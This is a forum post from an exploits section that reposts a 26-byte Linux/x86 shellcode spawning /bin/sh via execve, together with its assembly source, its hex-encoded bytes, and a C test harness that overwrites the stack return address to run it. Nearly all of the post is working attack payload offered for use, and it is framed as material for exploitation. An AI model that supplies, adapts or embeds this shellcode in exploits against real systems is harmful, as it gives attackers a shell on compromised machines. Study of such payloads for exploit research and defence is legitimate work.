Jump to content
Aerosol

Linux/x86 execve "/bin/sh" - shellcode 26 bytes

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

/*
; Title: Linux/x86 execve "/bin/sh" - shellcode 26 bytes
; Platform: linux/x86_64
; Date: 2015-05-19
; Author: Reza Behzadpour
; Simple ShellCode

    section .text
    global _start

    _start:

    xor  ecx,ecx
    mul  ecx

    ;execve("/bin/sh", NULL, NULL)
    mov  al,11
    jmp  shell
    shell_ret:
    pop  ebx
    push ecx
    push ebx
    pop  ebx
    int  0x80

    shell:
    call shell_ret
    db  "/bin/sh"

*/

/*

# tcc -o ./shellcode ./shellcode.c
# uname -r
3.12-kali1-686-pae

*/

#include <stdio.h>
#include <string.h>

char shellcode[] = {
     "\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b"
     "\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff"
     "\xff\x2f\x62\x69\x6e\x2f\x73\x68"
};

int main() 
{

    printf("Shellcode Length:  %d\n", (int)strlen(shellcode));
    int *ret;
    ret = (int *) &ret + 2;
    (*ret) = (int) shellcode;

    return 0;
}

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...